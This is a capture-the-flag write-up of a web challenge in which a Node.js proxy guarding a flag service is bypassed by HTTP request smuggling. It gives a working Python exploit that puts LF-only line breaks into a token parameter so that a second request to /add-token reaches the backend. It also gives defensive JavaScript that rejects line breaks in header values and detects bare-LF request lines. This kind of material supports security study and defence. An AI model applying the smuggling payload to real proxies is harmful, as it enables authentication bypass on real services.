Tags: web
I just added authentication to my flag service (server-back) thanks to a proxy (server-front), but a friend said it's useless...
The proxy's HTTP client can be exploited to make more than one request to the downstream server.
These are not valid HTTP requests, because some headers use only \n as the line terminator, but the downstream server will accept them (this no longer happens since Node.js 18.5.0).
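```python
import os
import random
import string

import requests

URL = os.environ.get("URL", "http://flag-proxy.challs.teamitaly.eu")

# Random token that the second, smuggled request registers on the backend
token = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(20))

# LF-only line endings: the backend treats what follows as extra headers and a new request
payload = 'AAAA\n'
payload += 'Content-Length: 0\n'
payload += 'Connection: keep-alive\n'
payload += '\n'
payload += f'GET /add-token?token={token} HTTP/1.0\n'
payload += 'Host: localhost'

# First request: the token parameter carries the smuggled /add-token request
response = requests.get(f"{URL}/flag", params={'token': payload})
print(response.text)

# Second request: ask for the flag with the token that was just added
response = requests.get(f"{URL}/flag", params={'token': token})
print(response.text)
```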
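The fix belongs on both sides of the proxy: refuse line breaks in anything copied into a header, and flag request heads that contain LF-only line endings. The following is an added example, not code from the challenge; the function names and the `X-Token` header name are assumptions, and the sample requests are constructed.

```javascript
// Added example: hypothetical helpers, not the challenge's source code.

// Allow only tab and printable ASCII in a header value. This is stricter
// than the RFC grammar, and it always rejects CR, LF and NUL.
const FIELD_VALUE = /^[\t\x20-\x7e]*$/;

// Proxy side: call this before copying user input into an outgoing header.
function assertHeaderValue(name, value) {
  if (typeof value !== 'string' || !FIELD_VALUE.test(value)) {
    throw new Error(`invalid characters in value for header ${name}`);
  }
  return value;
}

// Backend or log side: list every line of a raw request head that ends
// in a bare LF instead of CRLF. A strict parser should reject such input.
function bareLfLines(rawHead) {
  const hits = [];
  let lineNo = 1;
  let start = 0;
  for (let i = 0; i < rawHead.length; i++) {
    if (rawHead[i] !== '\n') continue;
    if (i === 0 || rawHead[i - 1] !== '\r') {
      hits.push({ line: lineNo, text: rawHead.slice(start, i) });
    }
    lineNo++;
    start = i + 1;
  }
  return hits;
}

// Constructed samples: a well-formed head, and one where the token value
// (header name X-Token is assumed) contains an LF-only line break.
const GOOD = 'GET /flag HTTP/1.1\r\nHost: localhost\r\nX-Token: ABC123\r\n\r\n';
const BAD = 'GET /flag HTTP/1.1\r\nHost: localhost\r\nX-Token: AAAA\nX-Extra: 1\r\n\r\n';

console.log(bareLfLines(GOOD)); // no findings
console.log(bareLfLines(BAD));  // one finding on line 3
```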